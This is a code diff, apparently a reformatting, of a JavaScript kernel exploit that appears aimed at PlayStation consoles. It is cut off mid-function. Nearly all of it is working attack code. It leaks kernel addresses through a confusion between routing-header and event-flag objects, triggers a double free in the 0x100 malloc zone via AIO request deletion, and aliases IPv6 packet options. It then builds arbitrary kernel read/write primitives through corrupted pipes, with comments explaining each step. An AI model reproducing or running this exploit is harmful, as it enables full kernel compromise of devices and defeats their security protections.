- get_rthdr(sd, buf);
- for (let off = 0x80; off < buf.length; off += 0x80) {
- if (verify_reqs2(buf, off)) {
- reqs2_off = off;
- log(`found reqs2 at attempt: ${i}`);
- break loop;
- }
- }
-
- free_aios(leak_ids_p, leak_ids_len);
+ if ((buf.read32(0) === flags32) | 1) {
+ evfs.splice(flags32 >> 16, 1);
+ } else {
+ evf = null;
}
- if (reqs2_off === null) {
- die('could not leak a reqs2');
+
+ for (const evf of evfs) {
+ free_evf(evf);
}
- log(`reqs2 offset: ${hex(reqs2_off)}`);
+
+ if (evf !== null) {
+ log(`confused rthdr and evf at attempt: ${i}`);
+ break;
+ }
+ }
+
+ if (evf === null) {
+ die("failed to confuse evf and rthdr");
+ }
+
+ set_evf_flags(evf, 0xff << 8);
+ get_rthdr(sd, buf, 0x80);
+
+ // fields we use from evf (number before the field is the offset in hex):
+ // struct evf:
+ // 0 u64 flags
+ // 28 struct cv cv
+ // 38 TAILQ_HEAD(struct evf_waiter) waiters
+
+ // evf.cv.cv_description = "evf cv"
+ // string is located at the kernel's mapped ELF file
+ const kernel_addr = buf.read64(0x28);
+ log(`"evf cv" string addr: ${kernel_addr}`);
+ // because of TAILQ_INIT(), we have:
+ //
+ // evf.waiters.tqh_last == &evf.waiters.tqh_first
+ //
+ // we now know the address of the kernel buffer we are leaking
+ const kbuf_addr = buf.read64(0x40).sub(0x38);
+ log(`kernel buffer addr: ${kbuf_addr}`);
+
+ // 0x80 < num_elems * sizeof(SceKernelAioRWRequest) <= 0x100
+ // allocate reqs1 arrays at 0x100 malloc zone
+ const num_elems = 6;
+ // use reqs1 to fake a aio_info. set .ai_cred (offset 0x10) to offset 4 of
+ // the reqs2 so crfree(ai_cred) will harmlessly decrement the .ar2_ticket
+ // field
+ const ucred = kbuf_addr.add(4);
+
+ const leak_reqs = make_reqs1(num_elems);
+ const leak_reqs_p = leak_reqs.addr;
+ leak_reqs.write64(0x10, ucred);
+
+ const leak_ids_len = num_handles * num_elems;
+ const leak_ids = new View4(leak_ids_len);
+ const leak_ids_p = leak_ids.addr;
+
+ log("find aio_entry");
+ let reqs2_off = null;
+ loop: for (let i = 0; i < num_leaks; i++) {
+ get_rthdr(sd, buf);
+
+ spray_aio(num_handles, leak_reqs_p, num_elems, leak_ids_p, true, AIO_CMD_WRITE);
get_rthdr(sd, buf);
- const reqs2 = buf.slice(reqs2_off, reqs2_off + 0x80);
- log('leaked aio_entry:');
- hexdump(reqs2);
-
- const reqs1_addr = new Long(reqs2.read64(0x10));
- log(`reqs1_addr: ${reqs1_addr}`);
- reqs1_addr.lo &= -0x100;
- log(`reqs1_addr: ${reqs1_addr}`);
-
- log('searching target_id');
- let target_id = null;
- let to_cancel_p = null;
- let to_cancel_len = null;
- for (let i = 0; i < leak_ids_len; i += num_elems) {
- aio_multi_cancel(leak_ids_p.add(i << 2), num_elems);
-
- get_rthdr(sd, buf);
- const state = buf.read32(reqs2_off + 0x38);
- if (state === AIO_STATE_ABORTED) {
- log(`found target_id at batch: ${i / num_elems}`);
-
- target_id = new Word(leak_ids[i]);
- leak_ids[i] = 0;
- log(`target_id: ${hex(target_id)}`);
-
- const reqs2 = buf.slice(reqs2_off, reqs2_off + 0x80);
- log('leaked aio_entry:');
- hexdump(reqs2);
-
- const start = i + num_elems;
- to_cancel_p = leak_ids.addr_at(start);
- to_cancel_len = leak_ids_len - start;
- break;
- }
- }
- if (target_id === null) {
- die('target_id not found');
+ for (let off = 0x80; off < buf.length; off += 0x80) {
+ if (verify_reqs2(buf, off)) {
+ reqs2_off = off;
+ log(`found reqs2 at attempt: ${i}`);
+ break loop;
+ }
}
- cancel_aios(to_cancel_p, to_cancel_len);
- free_aios2(leak_ids_p, leak_ids_len);
+ free_aios(leak_ids_p, leak_ids_len);
+ }
+ if (reqs2_off === null) {
+ die("could not leak a reqs2");
+ }
+ log(`reqs2 offset: ${hex(reqs2_off)}`);
- return [reqs1_addr, kbuf_addr, kernel_addr, target_id, evf];
+ get_rthdr(sd, buf);
+ const reqs2 = buf.slice(reqs2_off, reqs2_off + 0x80);
+ log("leaked aio_entry:");
+ hexdump(reqs2);
+
+ const reqs1_addr = new Long(reqs2.read64(0x10));
+ log(`reqs1_addr: ${reqs1_addr}`);
+ reqs1_addr.lo &= -0x100;
+ log(`reqs1_addr: ${reqs1_addr}`);
+
+ log("searching target_id");
+ let target_id = null;
+ let to_cancel_p = null;
+ let to_cancel_len = null;
+ for (let i = 0; i < leak_ids_len; i += num_elems) {
+ aio_multi_cancel(leak_ids_p.add(i << 2), num_elems);
+
+ get_rthdr(sd, buf);
+ const state = buf.read32(reqs2_off + 0x38);
+ if (state === AIO_STATE_ABORTED) {
+ log(`found target_id at batch: ${i / num_elems}`);
+
+ target_id = new Word(leak_ids[i]);
+ leak_ids[i] = 0;
+ log(`target_id: ${hex(target_id)}`);
+
+ const reqs2 = buf.slice(reqs2_off, reqs2_off + 0x80);
+ log("leaked aio_entry:");
+ hexdump(reqs2);
+
+ const start = i + num_elems;
+ to_cancel_p = leak_ids.addr_at(start);
+ to_cancel_len = leak_ids_len - start;
+ break;
+ }
+ }
+ if (target_id === null) {
+ die("target_id not found");
+ }
+
+ cancel_aios(to_cancel_p, to_cancel_len);
+ free_aios2(leak_ids_p, leak_ids_len);
+
+ return [reqs1_addr, kbuf_addr, kernel_addr, target_id, evf];
}
// FUNCTIONS FOR STAGE: 0x100 MALLOC ZONE DOUBLE FREE
function make_aliased_pktopts(sds) {
- const tclass = new Word();
- for (let loop = 0; loop < num_alias; loop++) {
- for (let i = 0; i < num_sds; i++) {
- tclass[0] = i;
- ssockopt(sds[i], IPPROTO_IPV6, IPV6_TCLASS, tclass);
- }
-
- for (let i = 0; i < sds.length; i++) {
- gsockopt(sds[i], IPPROTO_IPV6, IPV6_TCLASS, tclass);
- const marker = tclass[0];
- if (marker !== i) {
- log(`aliased pktopts at attempt: ${loop}`);
- const pair = [sds[i], sds[marker]];
- log(`found pair: ${pair}`);
- sds.splice(marker, 1);
- sds.splice(i, 1);
- // add pktopts to the new sockets now while new allocs can't
- // use the double freed memory
- for (let i = 0; i < 2; i++) {
- const sd = new_socket();
- ssockopt(sd, IPPROTO_IPV6, IPV6_TCLASS, tclass);
- sds.push(sd);
- }
-
- return pair;
- }
- }
-
- for (let i = 0; i < num_sds; i++) {
- setsockopt(sds[i], IPPROTO_IPV6, IPV6_2292PKTOPTIONS, 0, 0);
- }
+ const tclass = new Word();
+ for (let loop = 0; loop < num_alias; loop++) {
+ for (let i = 0; i < num_sds; i++) {
+ tclass[0] = i;
+ ssockopt(sds[i], IPPROTO_IPV6, IPV6_TCLASS, tclass);
}
- die('failed to make aliased pktopts');
+
+ for (let i = 0; i < sds.length; i++) {
+ gsockopt(sds[i], IPPROTO_IPV6, IPV6_TCLASS, tclass);
+ const marker = tclass[0];
+ if (marker !== i) {
+ log(`aliased pktopts at attempt: ${loop}`);
+ const pair = [sds[i], sds[marker]];
+ log(`found pair: ${pair}`);
+ sds.splice(marker, 1);
+ sds.splice(i, 1);
+ // add pktopts to the new sockets now while new allocs can't
+ // use the double freed memory
+ for (let i = 0; i < 2; i++) {
+ const sd = new_socket();
+ ssockopt(sd, IPPROTO_IPV6, IPV6_TCLASS, tclass);
+ sds.push(sd);
+ }
+
+ return pair;
+ }
+ }
+
+ for (let i = 0; i < num_sds; i++) {
+ setsockopt(sds[i], IPPROTO_IPV6, IPV6_2292PKTOPTIONS, 0, 0);
+ }
+ }
+ die("failed to make aliased pktopts");
}
-function double_free_reqs1(
- reqs1_addr, kbuf_addr, target_id, evf, sd, sds,
-) {
- const max_leak_len = (0xff + 1) << 3;
- const buf = new Buffer(max_leak_len);
+function double_free_reqs1(reqs1_addr, kbuf_addr, target_id, evf, sd, sds) {
+ const max_leak_len = (0xff + 1) << 3;
+ const buf = new Buffer(max_leak_len);
- const num_elems = max_aio_ids;
- const aio_reqs = make_reqs1(num_elems);
- const aio_reqs_p = aio_reqs.addr;
+ const num_elems = max_aio_ids;
+ const aio_reqs = make_reqs1(num_elems);
+ const aio_reqs_p = aio_reqs.addr;
- const num_batches = 2;
- const aio_ids_len = num_batches * num_elems;
- const aio_ids = new View4(aio_ids_len);
- const aio_ids_p = aio_ids.addr;
+ const num_batches = 2;
+ const aio_ids_len = num_batches * num_elems;
+ const aio_ids = new View4(aio_ids_len);
+ const aio_ids_p = aio_ids.addr;
- log('start overwrite rthdr with AIO queue entry loop');
- let aio_not_found = true;
- free_evf(evf);
- for (let i = 0; i < num_clobbers; i++) {
- spray_aio(num_batches, aio_reqs_p, num_elems, aio_ids_p);
+ log("start overwrite rthdr with AIO queue entry loop");
+ let aio_not_found = true;
+ free_evf(evf);
+ for (let i = 0; i < num_clobbers; i++) {
+ spray_aio(num_batches, aio_reqs_p, num_elems, aio_ids_p);
- if (get_rthdr(sd, buf) === 8 && buf.read32(0) === AIO_CMD_READ) {
- log(`aliased at attempt: ${i}`);
- aio_not_found = false;
- cancel_aios(aio_ids_p, aio_ids_len);
+ if (get_rthdr(sd, buf) === 8 && buf.read32(0) === AIO_CMD_READ) {
+ log(`aliased at attempt: ${i}`);
+ aio_not_found = false;
+ cancel_aios(aio_ids_p, aio_ids_len);
+ break;
+ }
+
+ free_aios(aio_ids_p, aio_ids_len);
+ }
+ if (aio_not_found) {
+ die("failed to overwrite rthdr");
+ }
+
+ const reqs2 = new Buffer(0x80);
+ const rsize = build_rthdr(reqs2, reqs2.size);
+ // .ar2_ticket
+ reqs2.write32(4, 5);
+ // .ar2_info
+ reqs2.write64(0x18, reqs1_addr);
+ // craft a aio_batch using the end portion of the buffer
+ const reqs3_off = 0x28;
+ // .ar2_batch
+ reqs2.write64(0x20, kbuf_addr.add(reqs3_off));
+
+ // [.ar3_num_reqs, .ar3_reqs_left] aliases .ar2_spinfo
+ // safe since free_queue_entry() doesn't deref the pointer
+ reqs2.write32(reqs3_off, 1);
+ reqs2.write32(reqs3_off + 4, 0);
+ // [.ar3_state, .ar3_done] aliases .ar2_result.returnValue
+ reqs2.write32(reqs3_off + 8, AIO_STATE_COMPLETE);
+ reqs2[reqs3_off + 0xc] = 0;
+ // .ar3_lock aliases .ar2_qentry (rest of the buffer is padding)
+ // safe since the entry already got dequeued
+ //
+ // .ar3_lock.lock_object.lo_flags = (
+ // LO_SLEEPABLE | LO_UPGRADABLE
+ // | LO_RECURSABLE | LO_DUPOK | LO_WITNESS
+ // | 6 << LO_CLASSSHIFT
+ // | LO_INITIALIZED
+ // )
+ reqs2.write32(reqs3_off + 0x28, 0x67b0000);
+ // .ar3_lock.lk_lock = LK_UNLOCKED
+ reqs2.write64(reqs3_off + 0x38, 1);
+
+ const states = new View4(num_elems);
+ const states_p = states.addr;
+ const addr_cache = [aio_ids_p];
+ for (let i = 1; i < num_batches; i++) {
+ addr_cache.push(aio_ids_p.add((i * num_elems) << 2));
+ }
+
+ log("start overwrite AIO queue entry with rthdr loop");
+ let req_id = null;
+ close(sd);
+ sd = null;
+ loop: for (let i = 0; i < num_alias; i++) {
+ for (const sd of sds) {
+ set_rthdr(sd, reqs2, rsize);
+ }
+
+ for (let batch = 0; batch < addr_cache.length; batch++) {
+ states.fill(-1);
+ aio_multi_cancel(addr_cache[batch], num_elems, states_p);
+
+ const req_idx = states.indexOf(AIO_STATE_COMPLETE);
+ if (req_idx !== -1) {
+ log(`req_idx: ${req_idx}`);
+ log(`found req_id at batch: ${batch}`);
+ log(`states: ${[...states].map((e) => hex(e))}`);
+ log(`states[${req_idx}]: ${hex(states[req_idx])}`);
+ log(`aliased at attempt: ${i}`);
+
+ const aio_idx = batch * num_elems + req_idx;
+ req_id = new Word(aio_ids[aio_idx]);
+ log(`req_id: ${hex(req_id)}`);
+ aio_ids[aio_idx] = 0;
+
+ // set .ar3_done to 1
+ poll_aio(req_id, states);
+ log(`states[${req_idx}]: ${hex(states[0])}`);
+ for (let i = 0; i < num_sds; i++) {
+ const sd2 = sds[i];
+ get_rthdr(sd2, reqs2);
+ const done = reqs2[reqs3_off + 0xc];
+ if (done) {
+ hexdump(reqs2);
+ sd = sd2;
+ sds.splice(i, 1);
+ free_rthdrs(sds);
+ sds.push(new_socket());
break;
+ }
}
+ if (sd === null) {
+ die("can't find sd that overwrote AIO queue entry");
+ }
+ log(`sd: ${sd}`);
- free_aios(aio_ids_p, aio_ids_len);
+ break loop;
+ }
}
- if (aio_not_found) {
- die('failed to overwrite rthdr');
+ }
+ if (req_id === null) {
+ die("failed to overwrite AIO queue entry");
+ }
+ free_aios2(aio_ids_p, aio_ids_len);
+
+ // enable deletion of target_id
+ poll_aio(target_id, states);
+ log(`target's state: ${hex(states[0])}`);
+
+ const sce_errs = new View4([-1, -1]);
+ const target_ids = new View4([req_id, target_id]);
+ // PANIC: double free on the 0x100 malloc zone. important kernel data may
+ // alias
+ aio_multi_delete(target_ids.addr, 2, sce_errs.addr);
+
+ // we reclaim first since the sanity checking here is longer which makes it
+ // more likely that we have another process claim the memory
+ try {
+ // RESTORE: double freed memory has been reclaimed with harmless data
+ // PANIC: 0x100 malloc zone pointers aliased
+ const sd_pair = make_aliased_pktopts(sds);
+ return [sd_pair, sd];
+ } finally {
+ log(`delete errors: ${hex(sce_errs[0])}, ${hex(sce_errs[1])}`);
+
+ states[0] = -1;
+ states[1] = -1;
+ poll_aio(target_ids, states);
+ log(`target states: ${hex(states[0])}, ${hex(states[1])}`);
+
+ const SCE_KERNEL_ERROR_ESRCH = 0x80020003;
+ let success = true;
+ if (states[0] !== SCE_KERNEL_ERROR_ESRCH) {
+ log("ERROR: bad delete of corrupt AIO request");
+ success = false;
+ }
+ if (sce_errs[0] !== 0 || sce_errs[0] !== sce_errs[1]) {
+ log("ERROR: bad delete of ID pair");
+ success = false;
}
- const reqs2 = new Buffer(0x80);
- const rsize = build_rthdr(reqs2, reqs2.size);
- // .ar2_ticket
- reqs2.write32(4, 5);
- // .ar2_info
- reqs2.write64(0x18, reqs1_addr);
- // craft a aio_batch using the end portion of the buffer
- const reqs3_off = 0x28;
- // .ar2_batch
- reqs2.write64(0x20, kbuf_addr.add(reqs3_off));
-
- // [.ar3_num_reqs, .ar3_reqs_left] aliases .ar2_spinfo
- // safe since free_queue_entry() doesn't deref the pointer
- reqs2.write32(reqs3_off, 1);
- reqs2.write32(reqs3_off + 4, 0);
- // [.ar3_state, .ar3_done] aliases .ar2_result.returnValue
- reqs2.write32(reqs3_off + 8, AIO_STATE_COMPLETE);
- reqs2[reqs3_off + 0xc] = 0;
- // .ar3_lock aliases .ar2_qentry (rest of the buffer is padding)
- // safe since the entry already got dequeued
- //
- // .ar3_lock.lock_object.lo_flags = (
- // LO_SLEEPABLE | LO_UPGRADABLE
- // | LO_RECURSABLE | LO_DUPOK | LO_WITNESS
- // | 6 << LO_CLASSSHIFT
- // | LO_INITIALIZED
- // )
- reqs2.write32(reqs3_off + 0x28, 0x67b0000);
- // .ar3_lock.lk_lock = LK_UNLOCKED
- reqs2.write64(reqs3_off + 0x38, 1);
-
- const states = new View4(num_elems);
- const states_p = states.addr;
- const addr_cache = [aio_ids_p];
- for (let i = 1; i < num_batches; i++) {
- addr_cache.push(aio_ids_p.add((i * num_elems) << 2));
- }
-
- log('start overwrite AIO queue entry with rthdr loop');
- let req_id = null;
- close(sd);
- sd = null;
- loop: for (let i = 0; i < num_alias; i++) {
- for (const sd of sds) {
- set_rthdr(sd, reqs2, rsize);
- }
-
- for (let batch = 0; batch < addr_cache.length; batch++) {
- states.fill(-1);
- aio_multi_cancel(addr_cache[batch], num_elems, states_p);
-
- const req_idx = states.indexOf(AIO_STATE_COMPLETE);
- if (req_idx !== -1) {
- log(`req_idx: ${req_idx}`);
- log(`found req_id at batch: ${batch}`);
- log(`states: ${[...states].map(e => hex(e))}`);
- log(`states[${req_idx}]: ${hex(states[req_idx])}`);
- log(`aliased at attempt: ${i}`);
-
- const aio_idx = batch*num_elems + req_idx;
- req_id = new Word(aio_ids[aio_idx]);
- log(`req_id: ${hex(req_id)}`);
- aio_ids[aio_idx] = 0;
-
- // set .ar3_done to 1
- poll_aio(req_id, states);
- log(`states[${req_idx}]: ${hex(states[0])}`);
- for (let i = 0; i < num_sds; i++) {
- const sd2 = sds[i];
- get_rthdr(sd2, reqs2);
- const done = reqs2[reqs3_off + 0xc];
- if (done) {
- hexdump(reqs2);
- sd = sd2;
- sds.splice(i, 1);
- free_rthdrs(sds);
- sds.push(new_socket());
- break;
- }
- }
- if (sd === null) {
- die('can\'t find sd that overwrote AIO queue entry');
- }
- log(`sd: ${sd}`);
-
- break loop;
- }
- }
- }
- if (req_id === null) {
- die('failed to overwrite AIO queue entry');
- }
- free_aios2(aio_ids_p, aio_ids_len);
-
- // enable deletion of target_id
- poll_aio(target_id, states);
- log(`target's state: ${hex(states[0])}`);
-
- const sce_errs = new View4([-1, -1]);
- const target_ids = new View4([req_id, target_id]);
- // PANIC: double free on the 0x100 malloc zone. important kernel data may
- // alias
- aio_multi_delete(target_ids.addr, 2, sce_errs.addr);
-
- // we reclaim first since the sanity checking here is longer which makes it
- // more likely that we have another process claim the memory
- try {
- // RESTORE: double freed memory has been reclaimed with harmless data
- // PANIC: 0x100 malloc zone pointers aliased
- const sd_pair = make_aliased_pktopts(sds);
- return [sd_pair, sd];
- } finally {
- log(`delete errors: ${hex(sce_errs[0])}, ${hex(sce_errs[1])}`);
-
- states[0] = -1;
- states[1] = -1;
- poll_aio(target_ids, states);
- log(`target states: ${hex(states[0])}, ${hex(states[1])}`);
-
- const SCE_KERNEL_ERROR_ESRCH = 0x80020003;
- let success = true;
- if (states[0] !== SCE_KERNEL_ERROR_ESRCH) {
- log('ERROR: bad delete of corrupt AIO request');
- success = false;
- }
- if (sce_errs[0] !== 0 || sce_errs[0] !== sce_errs[1]) {
- log('ERROR: bad delete of ID pair');
- success = false;
- }
-
- if (!success) {
- die('ERROR: double free on a 0x100 malloc zone failed');
- }
+ if (!success) {
+ die("ERROR: double free on a 0x100 malloc zone failed");
}
+ }
}
// FUNCTIONS FOR STAGE: MAKE ARBITRARY KERNEL READ/WRITE
@@ -1193,310 +1155,300 @@ function double_free_reqs1(
// dirty_sd is the socket whose rthdr pointer is corrupt
// kernel_addr is the address of the "evf cv" string
function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) {
- const psd = pktopts_sds[0];
- const tclass = new Word();
- const off_tclass = is_ps4 ? 0xb0 : 0xc0;
+ const psd = pktopts_sds[0];
+ const tclass = new Word();
+ const off_tclass = is_ps4 ? 0xb0 : 0xc0;
- const pktopts = new Buffer(0x100);
- const rsize = build_rthdr(pktopts, pktopts.size);
- const pktinfo_p = k100_addr.add(0x10);
- // pktopts.ip6po_pktinfo = &pktopts.ip6po_pktinfo
- pktopts.write64(0x10, pktinfo_p);
+ const pktopts = new Buffer(0x100);
+ const rsize = build_rthdr(pktopts, pktopts.size);
+ const pktinfo_p = k100_addr.add(0x10);
+ // pktopts.ip6po_pktinfo = &pktopts.ip6po_pktinfo
+ pktopts.write64(0x10, pktinfo_p);
- log('overwrite main pktopts');
- let reclaim_sd = null;
- close(pktopts_sds[1]);
- for (let i = 0; i < num_alias; i++) {
- for (let i = 0; i < num_sds; i++) {
- // if a socket doesn't have a pktopts, setting the rthdr will make
- // one. the new pktopts might reuse the memory instead of the
- // rthdr. make sure the sockets already have a pktopts before
- pktopts.write32(off_tclass, 0x4141 | i << 16);
- set_rthdr(sds[i], pktopts, rsize);
- }
-
- gsockopt(psd, IPPROTO_IPV6, IPV6_TCLASS, tclass);
- const marker = tclass[0];
- if ((marker & 0xffff) === 0x4141) {
- log(`found reclaim sd at attempt: ${i}`);
- const idx = marker >>> 16;
- reclaim_sd = sds[idx];
- sds.splice(idx, 1);
- break;
- }
- }
- if (reclaim_sd === null) {
- die('failed to overwrite main pktopts');
+ log("overwrite main pktopts");
+ let reclaim_sd = null;
+ close(pktopts_sds[1]);
+ for (let i = 0; i < num_alias; i++) {
+ for (let i = 0; i < num_sds; i++) {
+ // if a socket doesn't have a pktopts, setting the rthdr will make
+ // one. the new pktopts might reuse the memory instead of the
+ // rthdr. make sure the sockets already have a pktopts before
+ pktopts.write32(off_tclass, 0x4141 | (i << 16));
+ set_rthdr(sds[i], pktopts, rsize);
}
- const pktinfo = new Buffer(0x14);
- pktinfo.write64(0, pktinfo_p);
- const nhop = new Word();
- const nhop_p = nhop.addr;
- const read_buf = new Buffer(8);
- const read_buf_p = read_buf.addr;
- function kread64(addr) {
- const len = 8;
- let offset = 0;
- while (offset < len) {
- // pktopts.ip6po_nhinfo = addr + offset
- pktinfo.write64(8, addr.add(offset));
- nhop[0] = len - offset;
+ gsockopt(psd, IPPROTO_IPV6, IPV6_TCLASS, tclass);
+ const marker = tclass[0];
+ if ((marker & 0xffff) === 0x4141) {
+ log(`found reclaim sd at attempt: ${i}`);
+ const idx = marker >>> 16;
+ reclaim_sd = sds[idx];
+ sds.splice(idx, 1);
+ break;
+ }
+ }
+ if (reclaim_sd === null) {
+ die("failed to overwrite main pktopts");
+ }
- ssockopt(psd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
- sysi(
- 'getsockopt',
- psd, IPPROTO_IPV6, IPV6_NEXTHOP,
- read_buf_p.add(offset), nhop_p,
- );
+ const pktinfo = new Buffer(0x14);
+ pktinfo.write64(0, pktinfo_p);
+ const nhop = new Word();
+ const nhop_p = nhop.addr;
+ const read_buf = new Buffer(8);
+ const read_buf_p = read_buf.addr;
+ function kread64(addr) {
+ const len = 8;
+ let offset = 0;
+ while (offset < len) {
+ // pktopts.ip6po_nhinfo = addr + offset
+ pktinfo.write64(8, addr.add(offset));
+ nhop[0] = len - offset;
- const n = nhop[0];
- if (n === 0) {
- read_buf[offset] = 0;
- offset += 1;
- } else {
- offset += n;
- }
- }
- return read_buf.read64(0);
+ ssockopt(psd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
+ sysi("getsockopt", psd, IPPROTO_IPV6, IPV6_NEXTHOP, read_buf_p.add(offset), nhop_p);
+
+ const n = nhop[0];
+ if (n === 0) {
+ read_buf[offset] = 0;
+ offset += 1;
+ } else {
+ offset += n;
+ }
+ }
+ return read_buf.read64(0);
+ }
+
+ log(`kread64(&"evf cv"): ${kread64(kernel_addr)}`);
+ const kstr = jstr(read_buf);
+ log(`*(&"evf cv"): ${kstr}`);
+ if (kstr !== "evf cv") {
+ die('test read of &"evf cv" failed');
+ }
+
+ const kbase = kernel_addr.sub(off_kstr);
+ log(`kernel base: ${kbase}`);
+
+ log("\nmaking arbitrary kernel read/write");
+ const cpuid = 7 - main_core;
+ const pcpu_p = kbase.add(off_cpuid_to_pcpu + cpuid * 8);
+ log(`cpuid_to_pcpu[${cpuid}]: ${pcpu_p}`);
+ const pcpu = kread64(pcpu_p);
+ log(`pcpu: ${pcpu}`);
+ log(`cpuid: ${kread64(pcpu.add(0x30)).hi}`);
+ // __pcpu[cpuid].pc_curthread
+ const td = kread64(pcpu);
+ log(`td: ${td}`);
+
+ const off_td_proc = 8;
+ const proc = kread64(td.add(off_td_proc));
+ log(`proc: ${proc}`);
+ const pid = sysi("getpid");
+ log(`our pid: ${pid}`);
+ const pid2 = kread64(proc.add(0xb0)).lo;
+ log(`suspected proc pid: ${pid2}`);
+ if (pid2 !== pid) {
+ die("process not found");
+ }
+
+ const off_p_fd = 0x48;
+ const p_fd = kread64(proc.add(off_p_fd));
+ log(`proc.p_fd: ${p_fd}`);
+ // curthread->td_proc->p_fd->fd_ofiles
+ const ofiles = kread64(p_fd);
+ log(`ofiles: ${ofiles}`);
+
+ const off_p_ucred = 0x40;
+ const p_ucred = kread64(proc.add(off_p_ucred));
+ log(`p_ucred ${p_ucred}`);
+
+ const pipes = new View4(2);
+ sysi("pipe", pipes.addr);
+ const pipe_file = kread64(ofiles.add(pipes[0] * 8));
+ log(`pipe file: ${pipe_file}`);
+ // ofiles[pipe_fd].f_data
+ const kpipe = kread64(pipe_file);
+ log(`pipe pointer: ${kpipe}`);
+
+ const pipe_save = new Buffer(0x18); // sizeof struct pipebuf
+ for (let off = 0; off < pipe_save.size; off += 8) {
+ pipe_save.write64(off, kread64(kpipe.add(off)));
+ }
+
+ const main_sd = psd;
+ const worker_sd = dirty_sd;
+
+ const main_file = kread64(ofiles.add(main_sd * 8));
+ log(`main sock file: ${main_file}`);
+ // ofiles[sd].f_data
+ const main_sock = kread64(main_file);
+ log(`main sock pointer: ${main_sock}`);
+ // socket.so_pcb (struct inpcb *)
+ const m_pcb = kread64(main_sock.add(0x18));
+ log(`main sock pcb: ${m_pcb}`);
+ // inpcb.in6p_outputopts
+ const m_pktopts = kread64(m_pcb.add(0x118));
+ log(`main pktopts: ${m_pktopts}`);
+ log(`0x100 malloc zone pointer: ${k100_addr}`);
+
+ if (m_pktopts.ne(k100_addr)) {
+ die("main pktopts pointer != leaked pktopts pointer");
+ }
+
+ // ofiles[sd].f_data
+ const reclaim_sock = kread64(kread64(ofiles.add(reclaim_sd * 8)));
+ log(`reclaim sock pointer: ${reclaim_sock}`);
+ // socket.so_pcb (struct inpcb *)
+ const r_pcb = kread64(reclaim_sock.add(0x18));
+ log(`reclaim sock pcb: ${r_pcb}`);
+ // inpcb.in6p_outputopts
+ const r_pktopts = kread64(r_pcb.add(0x118));
+ log(`reclaim pktopts: ${r_pktopts}`);
+
+ // ofiles[sd].f_data
+ const worker_sock = kread64(kread64(ofiles.add(worker_sd * 8)));
+ log(`worker sock pointer: ${worker_sock}`);
+ // socket.so_pcb (struct inpcb *)
+ const w_pcb = kread64(worker_sock.add(0x18));
+ log(`worker sock pcb: ${w_pcb}`);
+ // inpcb.in6p_outputopts
+ const w_pktopts = kread64(w_pcb.add(0x118));
+ log(`worker pktopts: ${w_pktopts}`);
+
+ // get restricted read/write with pktopts pair
+ // main_pktopts.ip6po_pktinfo = &worker_pktopts.ip6po_pktinfo
+ const w_pktinfo = w_pktopts.add(0x10);
+ pktinfo.write64(0, w_pktinfo);
+ pktinfo.write64(8, 0); // clear .ip6po_nexthop
+ ssockopt(main_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
+
+ pktinfo.write64(0, kernel_addr);
+ ssockopt(main_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
+ gsockopt(worker_sd, IPPROTO_IPV6, IPV6_PKTINFO, pktinfo);
+ const kstr2 = jstr(pktinfo);
+ log(`*(&"evf cv"): ${kstr2}`);
+ if (kstr2 !== "evf cv") {
+ die("pktopts read failed");
+ }
+ log("achieved restricted kernel read/write");
+
+ // in6_pktinfo.ipi6_ifindex must be 0 (or a valid interface index) when
+ // using pktopts write. we can safely modify a pipe even with this limit so
+ // we corrupt that instead for arbitrary read/write. pipe.pipe_map will be
+ // clobbered with zeros but that's okay
+ class KernelMemory {
+ constructor(main_sd, worker_sd, pipes, pipe_addr) {
+ this.main_sd = main_sd;
+ this.worker_sd = worker_sd;
+ this.rpipe = pipes[0];
+ this.wpipe = pipes[1];
+ this.pipe_addr = pipe_addr; // &pipe.pipe_buf
+ this.pipe_addr2 = pipe_addr.add(0x10); // &pipe.pipe_buf.buffer
+ this.rw_buf = new Buffer(0x14);
+ this.addr_buf = new Buffer(0x14);
+ this.data_buf = new Buffer(0x14);
+ this.data_buf.write32(0xc, 0x40000000);
}
- log(`kread64(&"evf cv"): ${kread64(kernel_addr)}`);
- const kstr = jstr(read_buf);
- log(`*(&"evf cv"): ${kstr}`);
- if (kstr !== 'evf cv') {
- die('test read of &"evf cv" failed');
+ _verify_len(len) {
+ if (!(Number.isInteger(len) && 0 <= len <= 0xffffffff)) {
+ throw TypeError("len not a 32-bit unsigned integer");
+ }
}
- const kbase = kernel_addr.sub(off_kstr);
- log(`kernel base: ${kbase}`);
+ copyin(src, dst, len) {
+ this._verify_len(len);
+ const main = this.main_sd;
+ const worker = this.worker_sd;
+ const addr_buf = this.addr_buf;
+ const data_buf = this.data_buf;
- log('\nmaking arbitrary kernel read/write');
- const cpuid = 7 - main_core;
- const pcpu_p = kbase.add(off_cpuid_to_pcpu + cpuid*8);
- log(`cpuid_to_pcpu[${cpuid}]: ${pcpu_p}`);
- const pcpu = kread64(pcpu_p);
- log(`pcpu: ${pcpu}`);
- log(`cpuid: ${kread64(pcpu.add(0x30)).hi}`);
- // __pcpu[cpuid].pc_curthread
- const td = kread64(pcpu);
- log(`td: ${td}`);
+ addr_buf.write64(0, this.pipe_addr);
+ ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
- const off_td_proc = 8;
- const proc = kread64(td.add(off_td_proc));
- log(`proc: ${proc}`);
- const pid = sysi('getpid');
- log(`our pid: ${pid}`);
- const pid2 = kread64(proc.add(0xb0)).lo;
- log(`suspected proc pid: ${pid2}`);
- if (pid2 !== pid) {
- die('process not found');
+ data_buf.write64(0, 0);
+ ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, data_buf);
+
+ addr_buf.write64(0, this.pipe_addr2);
+ ssockopt(main, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+ addr_buf.write64(0, dst);
+ ssockopt(worker, IPPROTO_IPV6, IPV6_PKTINFO, addr_buf);
+
+ sysi("write", this.wpipe, src, len);
}
- const off_p_fd = 0x48;
- const p_fd = kread64(proc.add(off_p_fd));
- log(`proc.p_fd: ${p_fd}`);
- // curthread->td_proc->p_fd->fd_ofiles
- const ofiles = kread64(p_fd);
- log(`ofiles: ${ofiles}`);
+ copyout(src, dst, len) {
+ this._verify_len(len);
+ const main = this.main_sd;
+ const worker = this.worker_sd;
+ const addr_buf = this.addr_buf;
+ const data_buf = this.data_buf;
- const off_p_ucred = 0x40;
- const p_ucred = kread64(proc.add(off_p_ucred));
